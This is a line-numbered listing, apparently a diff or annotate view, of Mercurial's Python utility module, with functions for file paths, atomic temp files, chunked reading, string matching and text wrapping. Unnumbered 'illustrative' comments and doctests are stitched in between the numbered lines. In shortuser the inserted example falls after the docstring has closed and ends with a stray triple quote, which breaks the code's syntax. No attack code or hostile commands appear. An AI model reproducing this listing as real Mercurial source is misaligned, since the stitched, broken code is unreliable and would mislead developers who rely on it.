1796 1802 if pycompat.osaltsep:
1797 1803 seps = seps + pycompat.osaltsep
1798 1804 # Protect backslashes. This gets silly very quickly.
1799 1805 seps = seps.replace('\\', '\\\\')
1800 1806 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1801 1807 dir = os.path.normpath(root)
1802 1808 result = []
1803 1809 for part, sep in pattern.findall(name):
1804 1810 if sep:
1805 1811 result.append(sep)
1806 1812 continue
1807 1813
1808 1814 if dir not in _fspathcache:
1809 1815 _fspathcache[dir] = _makefspathcacheentry(dir)
1810 1816 contents = _fspathcache[dir]
1811 1817
1812 1818 found = contents.get(part)
1813 1819 if not found:
1814 1820 # retry "once per directory" per "dirstate.walk" which
1815 1821 # may take place for each patch of "hg qpush", for example
1816 1822 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1817 1823 found = contents.get(part)
1818 1824
1819 1825 result.append(found or part)
1820 1826 dir = os.path.join(dir, part)
1821 1827
1822 1828 return ''.join(result)
1823 1829
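# Usage sketch (illustrative; requires a real directory tree). With a file
# stored as 'Foo/Bar.txt' under /repo on a case-insensitive filesystem:
#
#   fspath(b'foo/bar.txt', b'/repo')   # -> 'Foo/Bar.txt'
#
# Both arguments must already be normcase-ed; lookups are memoized per
# directory in _fspathcache.
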
1824 1830 def checknlink(testfile):
1825 1831 '''check whether hardlink count reporting works properly'''
1826 1832
1827 1833 # testfile may be open, so we need a separate file for checking to
1828 1834 # work around issue2543 (or testfile may get lost on Samba shares)
1829 1835 f1, f2, fp = None, None, None
1830 1836 try:
1831 1837 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1832 1838 suffix='1~', dir=os.path.dirname(testfile))
1833 1839 os.close(fd)
1834 1840 f2 = '%s2~' % f1[:-2]
1835 1841
1836 1842 oslink(f1, f2)
1837 1843 # nlinks() may behave differently for files on Windows shares if
1838 1844 # the file is open.
1839 1845 fp = posixfile(f2)
1840 1846 return nlinks(f2) > 1
1841 1847 except OSError:
1842 1848 return False
1843 1849 finally:
1844 1850 if fp is not None:
1845 1851 fp.close()
1846 1852 for f in (f1, f2):
1847 1853 try:
1848 1854 if f is not None:
1849 1855 os.unlink(f)
1850 1856 except OSError:
1851 1857 pass
1852 1858
1853 1859 def endswithsep(path):
1854 1860 '''Check path ends with os.sep or os.altsep.'''
1855 1861 return (path.endswith(pycompat.ossep)
1856 1862 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1857 1863
1858 1864 def splitpath(path):
1859 1865 '''Split path by os.sep.
1860 1866 Note that this function does not use os.altsep because this is
1861 1867 an alternative to a simple "xxx.split(os.sep)".
1862 1868 It is recommended to use os.path.normpath() before using this
1863 1869 function if needed.'''
1864 1870 return path.split(pycompat.ossep)
1865 1871
1866 1872 def gui():
1867 1873 '''Are we running in a GUI?'''
1868 1874 if pycompat.isdarwin:
1869 1875 if 'SSH_CONNECTION' in encoding.environ:
1870 1876 # handle SSH access to a box where the user is logged in
1871 1877 return False
1872 1878 elif getattr(osutil, 'isgui', None):
1873 1879 # check if a CoreGraphics session is available
1874 1880 return osutil.isgui()
1875 1881 else:
1876 1882 # pure build; use a safe default
1877 1883 return True
1878 1884 else:
1879 1885 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1880 1886
1881 1887 def mktempcopy(name, emptyok=False, createmode=None):
1882 1888 """Create a temporary file with the same contents from name
1883 1889
1884 1890 The permission bits are copied from the original file.
1885 1891
1886 1892 If the temporary file is going to be truncated immediately, you
1887 1893 can use emptyok=True as an optimization.
1888 1894
1889 1895 Returns the name of the temporary file.
1890 1896 """
1891 1897 d, fn = os.path.split(name)
1892 1898 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1893 1899 os.close(fd)
1894 1900 # Temporary files are created with mode 0600, which is usually not
1895 1901 # what we want. If the original file already exists, just copy
1896 1902 # its mode. Otherwise, manually obey umask.
1897 1903 copymode(name, temp, createmode)
1898 1904 if emptyok:
1899 1905 return temp
1900 1906 try:
1901 1907 try:
1902 1908 ifp = posixfile(name, "rb")
1903 1909 except IOError as inst:
1904 1910 if inst.errno == errno.ENOENT:
1905 1911 return temp
1906 1912 if not getattr(inst, 'filename', None):
1907 1913 inst.filename = name
1908 1914 raise
1909 1915 ofp = posixfile(temp, "wb")
1910 1916 for chunk in filechunkiter(ifp):
1911 1917 ofp.write(chunk)
1912 1918 ifp.close()
1913 1919 ofp.close()
1914 1920 except: # re-raises
1915 1921 try:
1916 1922 os.unlink(temp)
1917 1923 except OSError:
1918 1924 pass
1919 1925 raise
1920 1926 return temp
1921 1927
1922 1928 class filestat(object):
1923 1929 """help to exactly detect change of a file
1924 1930
1925 1931 The 'stat' attribute is the result of 'os.stat()' if the specified
1926 1932 'path' exists; otherwise it is None. This lets clients of this
1927 1933 class avoid a preparatory 'exists()' check.
1928 1934 """
1929 1935 def __init__(self, stat):
1930 1936 self.stat = stat
1931 1937
1932 1938 @classmethod
1933 1939 def frompath(cls, path):
1934 1940 try:
1935 1941 stat = os.stat(path)
1936 1942 except OSError as err:
1937 1943 if err.errno != errno.ENOENT:
1938 1944 raise
1939 1945 stat = None
1940 1946 return cls(stat)
1941 1947
1942 1948 @classmethod
1943 1949 def fromfp(cls, fp):
1944 1950 stat = os.fstat(fp.fileno())
1945 1951 return cls(stat)
1946 1952
1947 1953 __hash__ = object.__hash__
1948 1954
1949 1955 def __eq__(self, old):
1950 1956 try:
1951 1957 # if ambiguity between stat of new and old file is
1952 1958 # avoided, comparison of size, ctime and mtime is enough
1953 1959 # to exactly detect change of a file regardless of platform
1954 1960 return (self.stat.st_size == old.stat.st_size and
1955 1961 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1956 1962 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1957 1963 except AttributeError:
1958 1964 pass
1959 1965 try:
1960 1966 return self.stat is None and old.stat is None
1961 1967 except AttributeError:
1962 1968 return False
1963 1969
1964 1970 def isambig(self, old):
1965 1971 """Examine whether new (= self) stat is ambiguous against old one
1966 1972
1967 1973 "S[N]" below means stat of a file at N-th change:
1968 1974
1969 1975 - S[n-1].ctime < S[n].ctime: can detect change of a file
1970 1976 - S[n-1].ctime == S[n].ctime
1971 1977 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1972 1978 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1973 1979 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1974 1980 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1975 1981
1976 1982 Case (*2) above means that a file was changed twice or more
1977 1983 within the same second (= S[n-1].ctime), and timestamp
1978 1984 comparison is ambiguous.
1979 1985
1980 1986 The basic idea to avoid such ambiguity is "advance mtime by 1
1981 1987 second if the timestamp is ambiguous".
1982 1988
1983 1989 But advancing mtime only in case (*2) doesn't work as
1984 1990 expected, because naturally advanced S[n].mtime in case (*1)
1985 1991 might be equal to manually advanced S[n-1 or earlier].mtime.
1986 1992
1987 1993 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1988 1994 treated as ambiguous regardless of mtime, to avoid overlooking
1989 1995 changes hidden by such mtime conflicts.
1990 1996
1991 1997 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1992 1998 S[n].mtime", even if size of a file isn't changed.
1993 1999 """
1994 2000 try:
1995 2001 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
1996 2002 except AttributeError:
1997 2003 return False
1998 2004
1999 2005 def avoidambig(self, path, old):
2000 2006 """Change file stat of specified path to avoid ambiguity
2001 2007
2002 2008 'old' should be previous filestat of 'path'.
2003 2009
2004 2010 Avoiding ambiguity is skipped if the process doesn't have
2005 2011 appropriate privileges for 'path'; in that case this returns
2006 2012 False.
2007 2013
2008 2014 Otherwise, this returns True, as "ambiguity is avoided".
2009 2015 """
2010 2016 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2011 2017 try:
2012 2018 os.utime(path, (advanced, advanced))
2013 2019 except OSError as inst:
2014 2020 if inst.errno == errno.EPERM:
2015 2021 # utime() on the file created by another user causes EPERM,
2016 2022 # if a process doesn't have appropriate privileges
2017 2023 return False
2018 2024 raise
2019 2025 return True
2020 2026
2021 2027 def __ne__(self, other):
2022 2028 return not self == other
2023 2029
2024 2030 class atomictempfile(object):
2025 2031 '''writable file object that atomically updates a file
2026 2032
2027 2033 All writes will go to a temporary copy of the original file. Call
2028 2034 close() when you are done writing, and atomictempfile will rename
2029 2035 the temporary copy to the original name, making the changes
2030 2036 visible. If the object is destroyed without being closed, all your
2031 2037 writes are discarded.
2032 2038
2033 2039 The checkambig argument of the constructor is used with filestat,
2034 2040 and is useful only if the target file is guarded by a lock (e.g.
2035 2041 repo.lock or repo.wlock).
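
A usage sketch (illustrative):

    with atomictempfile(b'somefile') as fp:
        fp.write(b'new content')
    # 'somefile' is replaced only after the block exits cleanly; an
    # exception inside the block discards the temporary file instead.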
2036 2042 '''
2037 2043 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2038 2044 self.__name = name # permanent name
2039 2045 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2040 2046 createmode=createmode)
2041 2047 self._fp = posixfile(self._tempname, mode)
2042 2048 self._checkambig = checkambig
2043 2049
2044 2050 # delegated methods
2045 2051 self.read = self._fp.read
2046 2052 self.write = self._fp.write
2047 2053 self.seek = self._fp.seek
2048 2054 self.tell = self._fp.tell
2049 2055 self.fileno = self._fp.fileno
2050 2056
2051 2057 def close(self):
2052 2058 if not self._fp.closed:
2053 2059 self._fp.close()
2054 2060 filename = localpath(self.__name)
2055 2061 oldstat = self._checkambig and filestat.frompath(filename)
2056 2062 if oldstat and oldstat.stat:
2057 2063 rename(self._tempname, filename)
2058 2064 newstat = filestat.frompath(filename)
2059 2065 if newstat.isambig(oldstat):
2060 2066 # stat of changed file is ambiguous to original one
2061 2067 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2062 2068 os.utime(filename, (advanced, advanced))
2063 2069 else:
2064 2070 rename(self._tempname, filename)
2065 2071
2066 2072 def discard(self):
2067 2073 if not self._fp.closed:
2068 2074 try:
2069 2075 os.unlink(self._tempname)
2070 2076 except OSError:
2071 2077 pass
2072 2078 self._fp.close()
2073 2079
2074 2080 def __del__(self):
2075 2081 if safehasattr(self, '_fp'): # constructor actually did something
2076 2082 self.discard()
2077 2083
2078 2084 def __enter__(self):
2079 2085 return self
2080 2086
2081 2087 def __exit__(self, exctype, excvalue, traceback):
2082 2088 if exctype is not None:
2083 2089 self.discard()
2084 2090 else:
2085 2091 self.close()
2086 2092
2087 2093 def unlinkpath(f, ignoremissing=False):
2088 2094 """unlink and remove the directory if it is empty"""
2089 2095 if ignoremissing:
2090 2096 tryunlink(f)
2091 2097 else:
2092 2098 unlink(f)
2093 2099 # try removing directories that might now be empty
2094 2100 try:
2095 2101 removedirs(os.path.dirname(f))
2096 2102 except OSError:
2097 2103 pass
2098 2104
2099 2105 def tryunlink(f):
2100 2106 """Attempt to remove a file, ignoring ENOENT errors."""
2101 2107 try:
2102 2108 unlink(f)
2103 2109 except OSError as e:
2104 2110 if e.errno != errno.ENOENT:
2105 2111 raise
2106 2112
2107 2113 def makedirs(name, mode=None, notindexed=False):
2108 2114 """recursive directory creation with parent mode inheritance
2109 2115
2110 2116 Newly created directories are marked as "not to be indexed by
2111 2117 the content indexing service", if ``notindexed`` is specified
2112 2118 for "write" mode access.
2113 2119 """
2114 2120 try:
2115 2121 makedir(name, notindexed)
2116 2122 except OSError as err:
2117 2123 if err.errno == errno.EEXIST:
2118 2124 return
2119 2125 if err.errno != errno.ENOENT or not name:
2120 2126 raise
2121 2127 parent = os.path.dirname(os.path.abspath(name))
2122 2128 if parent == name:
2123 2129 raise
2124 2130 makedirs(parent, mode, notindexed)
2125 2131 try:
2126 2132 makedir(name, notindexed)
2127 2133 except OSError as err:
2128 2134 # Catch EEXIST to handle races
2129 2135 if err.errno == errno.EEXIST:
2130 2136 return
2131 2137 raise
2132 2138 if mode is not None:
2133 2139 os.chmod(name, mode)
2134 2140
2135 2141 def readfile(path):
2136 2142 with open(path, 'rb') as fp:
2137 2143 return fp.read()
2138 2144
2139 2145 def writefile(path, text):
2140 2146 with open(path, 'wb') as fp:
2141 2147 fp.write(text)
2142 2148
2143 2149 def appendfile(path, text):
2144 2150 with open(path, 'ab') as fp:
2145 2151 fp.write(text)
2146 2152
2147 2153 class chunkbuffer(object):
2148 2154 """Allow arbitrary sized chunks of data to be efficiently read from an
2149 2155 iterator over chunks of arbitrary size."""
2150 2156
2151 2157 def __init__(self, in_iter):
2152 2158 """in_iter is the iterator that's iterating over the input chunks."""
2153 2159 def splitbig(chunks):
2154 2160 for chunk in chunks:
2155 2161 if len(chunk) > 2**20:
2156 2162 pos = 0
2157 2163 while pos < len(chunk):
2158 2164 end = pos + 2 ** 18
2159 2165 yield chunk[pos:end]
2160 2166 pos = end
2161 2167 else:
2162 2168 yield chunk
2163 2169 self.iter = splitbig(in_iter)
2164 2170 self._queue = collections.deque()
2165 2171 self._chunkoffset = 0
2166 2172
2167 2173 def read(self, l=None):
2168 2174 """Read L bytes of data from the iterator of chunks of data.
2169 2175 Returns less than L bytes if the iterator runs dry.
2170 2176
2171 2177 If the size parameter is omitted, read everything."""
2172 2178 if l is None:
2173 2179 return ''.join(self.iter)
2174 2180
2175 2181 left = l
2176 2182 buf = []
2177 2183 queue = self._queue
2178 2184 while left > 0:
2179 2185 # refill the queue
2180 2186 if not queue:
2181 2187 target = 2**18
2182 2188 for chunk in self.iter:
2183 2189 queue.append(chunk)
2184 2190 target -= len(chunk)
2185 2191 if target <= 0:
2186 2192 break
2187 2193 if not queue:
2188 2194 break
2189 2195
2190 2196 # The easy way to do this would be to queue.popleft(), modify the
2191 2197 # chunk (if necessary), then queue.appendleft(). However, for cases
2192 2198 # where we read partial chunk content, this incurs 2 dequeue
2193 2199 # mutations and creates a new str for the remaining chunk in the
2194 2200 # queue. Our code below avoids this overhead.
2195 2201
2196 2202 chunk = queue[0]
2197 2203 chunkl = len(chunk)
2198 2204 offset = self._chunkoffset
2199 2205
2200 2206 # Use full chunk.
2201 2207 if offset == 0 and left >= chunkl:
2202 2208 left -= chunkl
2203 2209 queue.popleft()
2204 2210 buf.append(chunk)
2205 2211 # self._chunkoffset remains at 0.
2206 2212 continue
2207 2213
2208 2214 chunkremaining = chunkl - offset
2209 2215
2210 2216 # Use all of unconsumed part of chunk.
2211 2217 if left >= chunkremaining:
2212 2218 left -= chunkremaining
2213 2219 queue.popleft()
2214 2220 # offset == 0 is enabled by block above, so this won't merely
2215 2221 # copy via ``chunk[0:]``.
2216 2222 buf.append(chunk[offset:])
2217 2223 self._chunkoffset = 0
2218 2224
2219 2225 # Partial chunk needed.
2220 2226 else:
2221 2227 buf.append(chunk[offset:offset + left])
2222 2228 self._chunkoffset += left
2223 2229 left -= chunkremaining
2224 2230
2225 2231 return ''.join(buf)
2226 2232
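# Example (illustrative): a chunkbuffer rechunks its iterator on demand.
# Note that read() with no size returns only what is left in the source
# iterator; data already pulled into the internal queue stays queued:
#
#   buf = chunkbuffer(iter([b'ab', b'cd']))
#   buf.read(3)   # -> 'abc'
#   buf.read()    # -> '' (iterator already drained into the queue)
#   buf.read(3)   # -> 'd'
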
2227 2233 def filechunkiter(f, size=131072, limit=None):
2228 2234 """Create a generator that produces the data in the file size
2229 2235 (default 131072) bytes at a time, up to optional limit (default is
2230 2236 to read all data). Chunks may be less than size bytes if the
2231 2237 chunk is the last chunk in the file, or the file is a socket or
2232 2238 some other type of file that sometimes reads less data than is
2233 2239 requested."""
2234 2240 assert size >= 0
2235 2241 assert limit is None or limit >= 0
2236 2242 while True:
2237 2243 if limit is None:
2238 2244 nbytes = size
2239 2245 else:
2240 2246 nbytes = min(limit, size)
2241 2247 s = nbytes and f.read(nbytes)
2242 2248 if not s:
2243 2249 break
2244 2250 if limit:
2245 2251 limit -= len(s)
2246 2252 yield s
2247 2253
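# Example (illustrative):
#
#   list(filechunkiter(stringio(b'abcdefgh'), size=3))
#   # -> ['abc', 'def', 'gh']
#   list(filechunkiter(stringio(b'abcdefgh'), size=3, limit=4))
#   # -> ['abc', 'd']
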
2248 2254 class cappedreader(object):
2249 2255 """A file object proxy that allows reading up to N bytes.
2250 2256
2251 2257 Given a source file object, instances of this type allow reading up to
2252 2258 N bytes from that source file object. Attempts to read past the allowed
2253 2259 limit are treated as EOF.
2254 2260
2255 2261 It is assumed that no I/O is performed on the original file object
2256 2262 other than the I/O performed by this instance. If any is, state
2257 2263 tracking will get out of sync and unexpected results will ensue.
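
Example (illustrative):

>>> reader = cappedreader(stringio(b'0123456789'), 4)
>>> reader.read()
'0123'
>>> reader.read(1)
''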
2258 2264 """
2259 2265 def __init__(self, fh, limit):
2260 2266 """Allow reading up to <limit> bytes from <fh>."""
2261 2267 self._fh = fh
2262 2268 self._left = limit
2263 2269
2264 2270 def read(self, n=-1):
2265 2271 if not self._left:
2266 2272 return b''
2267 2273
2268 2274 if n < 0:
2269 2275 n = self._left
2270 2276
2271 2277 data = self._fh.read(min(n, self._left))
2272 2278 self._left -= len(data)
2273 2279 assert self._left >= 0
2274 2280
2275 2281 return data
2276 2282
2277 2283 def stringmatcher(pattern, casesensitive=True):
2278 2284 """
2279 2285 accepts a string, possibly starting with a 're:' or 'literal:' prefix.
2280 2286 returns the matcher name, pattern, and matcher function.
2281 2287 missing or unknown prefixes are treated as literal matches.
2282 2288
2283 2289 helper for tests:
2284 2290 >>> def test(pattern, *tests):
2285 2291 ... kind, pattern, matcher = stringmatcher(pattern)
2286 2292 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2287 2293 >>> def itest(pattern, *tests):
2288 2294 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2289 2295 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2290 2296
2291 2297 exact matching (no prefix):
2292 2298 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2293 2299 ('literal', 'abcdefg', [False, False, True])
2294 2300
2295 2301 regex matching ('re:' prefix)
2296 2302 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2297 2303 ('re', 'a.+b', [False, False, True])
2298 2304
2299 2305 force exact matches ('literal:' prefix)
2300 2306 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2301 2307 ('literal', 're:foobar', [False, True])
2302 2308
2303 2309 unknown prefixes are ignored and treated as literals
2304 2310 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2305 2311 ('literal', 'foo:bar', [False, False, True])
2306 2312
2307 2313 case insensitive regex matches
2308 2314 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2309 2315 ('re', 'A.+b', [False, False, True])
2310 2316
2311 2317 case insensitive literal matches
2312 2318 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2313 2319 ('literal', 'ABCDEFG', [False, False, True])
2314 2320 """
2315 2321 if pattern.startswith('re:'):
2316 2322 pattern = pattern[3:]
2317 2323 try:
2318 2324 flags = 0
2319 2325 if not casesensitive:
2320 2326 flags = remod.I
2321 2327 regex = remod.compile(pattern, flags)
2322 2328 except remod.error as e:
2323 2329 raise error.ParseError(_('invalid regular expression: %s')
2324 2330 % e)
2325 2331 return 're', pattern, regex.search
2326 2332 elif pattern.startswith('literal:'):
2327 2333 pattern = pattern[8:]
2328 2334
2329 2335 match = pattern.__eq__
2330 2336
2331 2337 if not casesensitive:
2332 2338 ipat = encoding.lower(pattern)
2333 2339 match = lambda s: ipat == encoding.lower(s)
2334 2340 return 'literal', pattern, match
2335 2341
2336 2342 def shortuser(user):
2337 2343 """Return a short representation of a user name or email address."""
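
Example (illustrative address):

>>> shortuser(b'Foo Bar <foo.bar@example.com>')
'foo'
"""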
2338 2344 f = user.find('@')
2339 2345 if f >= 0:
2340 2346 user = user[:f]
2341 2347 f = user.find('<')
2342 2348 if f >= 0:
2343 2349 user = user[f + 1:]
2344 2350 f = user.find(' ')
2345 2351 if f >= 0:
2346 2352 user = user[:f]
2347 2353 f = user.find('.')
2348 2354 if f >= 0:
2349 2355 user = user[:f]
2350 2356 return user
2351 2357
2352 2358 def emailuser(user):
2353 2359 """Return the user portion of an email address."""
2354 2360 f = user.find('@')
2355 2361 if f >= 0:
2356 2362 user = user[:f]
2357 2363 f = user.find('<')
2358 2364 if f >= 0:
2359 2365 user = user[f + 1:]
2360 2366 return user
2361 2367
2362 2368 def email(author):
2363 2369 '''get email of author.
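
>>> email(b'Foo Bar <foo@bar.example>')
'foo@bar.example'
>>> email(b'foo@bar.example')
'foo@bar.example'
'''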
2364 2370 r = author.find('>')
2365 2371 if r == -1:
2366 2372 r = None
2367 2373 return author[author.find('<') + 1:r]
2368 2374
2369 2375 def ellipsis(text, maxlength=400):
2370 2376 """Trim string to at most maxlength (default: 400) columns in display."""
2371 2377 return encoding.trim(text, maxlength, ellipsis='...')
2372 2378
2373 2379 def unitcountfn(*unittable):
2374 2380 '''return a function that renders a readable count of some quantity'''
2375 2381
2376 2382 def go(count):
2377 2383 for multiplier, divisor, format in unittable:
2378 2384 if abs(count) >= divisor * multiplier:
2379 2385 return format % (count / float(divisor))
2380 2386 return unittable[-1][2] % count
2381 2387
2382 2388 return go
2383 2389
2384 2390 def processlinerange(fromline, toline):
2385 2391 """Check that linerange <fromline>:<toline> makes sense and return a
2386 2392 0-based range.
2387 2393
2388 2394 >>> processlinerange(10, 20)
2389 2395 (9, 20)
2390 2396 >>> processlinerange(2, 1)
2391 2397 Traceback (most recent call last):
2392 2398 ...
2393 2399 ParseError: line range must be positive
2394 2400 >>> processlinerange(0, 5)
2395 2401 Traceback (most recent call last):
2396 2402 ...
2397 2403 ParseError: fromline must be strictly positive
2398 2404 """
2399 2405 if toline - fromline < 0:
2400 2406 raise error.ParseError(_("line range must be positive"))
2401 2407 if fromline < 1:
2402 2408 raise error.ParseError(_("fromline must be strictly positive"))
2403 2409 return fromline - 1, toline
2404 2410
2405 2411 bytecount = unitcountfn(
2406 2412 (100, 1 << 30, _('%.0f GB')),
2407 2413 (10, 1 << 30, _('%.1f GB')),
2408 2414 (1, 1 << 30, _('%.2f GB')),
2409 2415 (100, 1 << 20, _('%.0f MB')),
2410 2416 (10, 1 << 20, _('%.1f MB')),
2411 2417 (1, 1 << 20, _('%.2f MB')),
2412 2418 (100, 1 << 10, _('%.0f KB')),
2413 2419 (10, 1 << 10, _('%.1f KB')),
2414 2420 (1, 1 << 10, _('%.2f KB')),
2415 2421 (1, 1, _('%.0f bytes')),
2416 2422 )
2417 2423
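# Example (illustrative):
#
#   bytecount(4096)        # -> '4.00 KB'
#   bytecount(150000000)   # -> '143 MB'
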
2418 2424 # Matches a single EOL which can either be a CRLF where repeated CR
2419 2425 # are removed or a LF. We do not care about old Macintosh files, so a
2420 2426 # stray CR is an error.
2421 2427 _eolre = remod.compile(br'\r*\n')
2422 2428
2423 2429 def tolf(s):
2424 2430 return _eolre.sub('\n', s)
2425 2431
2426 2432 def tocrlf(s):
2427 2433 return _eolre.sub('\r\n', s)
2428 2434
2429 2435 if pycompat.oslinesep == '\r\n':
2430 2436 tonativeeol = tocrlf
2431 2437 fromnativeeol = tolf
2432 2438 else:
2433 2439 tonativeeol = pycompat.identity
2434 2440 fromnativeeol = pycompat.identity
2435 2441
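# Example (illustrative): runs of CRs before a LF collapse, per _eolre:
#
#   tolf(b'a\r\r\nb\n')    # -> 'a\nb\n'
#   tocrlf(b'a\nb\r\n')    # -> 'a\r\nb\r\n'
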
2436 2442 def escapestr(s):
2437 2443 # call underlying function of s.encode('string_escape') directly for
2438 2444 # Python 3 compatibility
2439 2445 return codecs.escape_encode(s)[0]
2440 2446
2441 2447 def unescapestr(s):
2442 2448 return codecs.escape_decode(s)[0]
2443 2449
2444 2450 def forcebytestr(obj):
2445 2451 """Portably format an arbitrary object (e.g. exception) into a byte
2446 2452 string."""
2447 2453 try:
2448 2454 return pycompat.bytestr(obj)
2449 2455 except UnicodeEncodeError:
2450 2456 # non-ascii string, may be lossy
2451 2457 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2452 2458
2453 2459 def uirepr(s):
2454 2460 # Avoid double backslash in Windows path repr()
2455 2461 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2456 2462
2457 2463 # delay import of textwrap
2458 2464 def MBTextWrapper(**kwargs):
2459 2465 class tw(textwrap.TextWrapper):
2460 2466 """
2461 2467 Extend TextWrapper for width-awareness.
2462 2468
2463 2469 Neither the number of 'bytes' in any encoding nor the number of
2464 2470 'characters' is appropriate for computing terminal columns of a string.
2465 2471
2466 2472 The original TextWrapper implementation uses the built-in 'len()'
2467 2473 directly, so overriding is needed to use the width information of
2468 2474 each character.
2469 2475
2470 2476 In addition, characters classified as 'ambiguous' width are treated
2471 2477 as wide in East Asian locales, but as narrow elsewhere. This requires
2472 2478 a per-use decision to determine the width of such characters.
2473 2479 """
2474 2480 def _cutdown(self, ucstr, space_left):
2475 2481 l = 0
2476 2482 colwidth = encoding.ucolwidth
2477 2483 for i in xrange(len(ucstr)):
2478 2484 l += colwidth(ucstr[i])
2479 2485 if space_left < l:
2480 2486 return (ucstr[:i], ucstr[i:])
2481 2487 return ucstr, ''
2482 2488
2483 2489 # overriding of base class
2484 2490 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2485 2491 space_left = max(width - cur_len, 1)
2486 2492
2487 2493 if self.break_long_words:
2488 2494 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2489 2495 cur_line.append(cut)
2490 2496 reversed_chunks[-1] = res
2491 2497 elif not cur_line:
2492 2498 cur_line.append(reversed_chunks.pop())
2493 2499
2494 2500 # this overriding code is imported from TextWrapper of Python 2.6
2495 2501 # to calculate columns of string by 'encoding.ucolwidth()'
2496 2502 def _wrap_chunks(self, chunks):
2497 2503 colwidth = encoding.ucolwidth
2498 2504
2499 2505 lines = []
2500 2506 if self.width <= 0:
2501 2507 raise ValueError("invalid width %r (must be > 0)" % self.width)
2502 2508
2503 2509 # Arrange in reverse order so items can be efficiently popped
2504 2510 # from a stack of chunks.
2505 2511 chunks.reverse()
2506 2512
2507 2513 while chunks:
2508 2514
2509 2515 # Start the list of chunks that will make up the current line.
2510 2516 # cur_len is just the length of all the chunks in cur_line.
2511 2517 cur_line = []
2512 2518 cur_len = 0
2513 2519
2514 2520 # Figure out which static string will prefix this line.
2515 2521 if lines:
2516 2522 indent = self.subsequent_indent
2517 2523 else:
2518 2524 indent = self.initial_indent
2519 2525
2520 2526 # Maximum width for this line.
2521 2527 width = self.width - len(indent)
2522 2528
2523 2529 # First chunk on line is whitespace -- drop it, unless this
2524 2530 # is the very beginning of the text (i.e. no lines started yet).
2525 2531 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2526 2532 del chunks[-1]
2527 2533
2528 2534 while chunks:
2529 2535 l = colwidth(chunks[-1])
2530 2536
2531 2537 # Can at least squeeze this chunk onto the current line.
2532 2538 if cur_len + l <= width:
2533 2539 cur_line.append(chunks.pop())
2534 2540 cur_len += l
2535 2541
2536 2542 # Nope, this line is full.
2537 2543 else:
2538 2544 break
2539 2545
2540 2546 # The current line is full, and the next chunk is too big to
2541 2547 # fit on *any* line (not just this one).
2542 2548 if chunks and colwidth(chunks[-1]) > width:
2543 2549 self._handle_long_word(chunks, cur_line, cur_len, width)
2544 2550
2545 2551 # If the last chunk on this line is all whitespace, drop it.
2546 2552 if (self.drop_whitespace and
2547 2553 cur_line and cur_line[-1].strip() == r''):
2548 2554 del cur_line[-1]
2549 2555
2550 2556 # Convert current line back to a string and store it in list
2551 2557 # of all lines (return value).
2552 2558 if cur_line:
2553 2559 lines.append(indent + r''.join(cur_line))
2554 2560
2555 2561 return lines
2556 2562
2557 2563 global MBTextWrapper
2558 2564 MBTextWrapper = tw
2559 2565 return tw(**kwargs)
2560 2566
2561 2567 def wrap(line, width, initindent='', hangindent=''):
2562 2568 maxindent = max(len(hangindent), len(initindent))
2563 2569 if width <= maxindent:
2564 2570 # adjust for weird terminal size
2565 2571 width = max(78, maxindent + 1)
2566 2572 line = line.decode(pycompat.sysstr(encoding.encoding),
2567 2573 pycompat.sysstr(encoding.encodingmode))
2568 2574 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2569 2575 pycompat.sysstr(encoding.encodingmode))
2570 2576 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2571 2577 pycompat.sysstr(encoding.encodingmode))
2572 2578 wrapper = MBTextWrapper(width=width,
2573 2579 initial_indent=initindent,
2574 2580 subsequent_indent=hangindent)
2575 2581 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2576 2582
2577 2583 if (pyplatform.python_implementation() == 'CPython' and
2578 2584 sys.version_info < (3, 0)):
2579 2585 # There is an issue in CPython that some IO methods do not handle EINTR
2580 2586 # correctly. The following table shows what CPython version (and functions)
2581 2587 # are affected (buggy: has the EINTR bug, okay: otherwise):
2582 2588 #
2583 2589 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2584 2590 # --------------------------------------------------
2585 2591 # fp.__iter__ | buggy | buggy | okay
2586 2592 # fp.read* | buggy | okay [1] | okay
2587 2593 #
2588 2594 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2589 2595 #
2590 2596 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2591 2597 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2592 2598 #
2593 2599 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2594 2600 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2595 2601 # CPython 2, because CPython 2 maintains an internal readahead buffer for
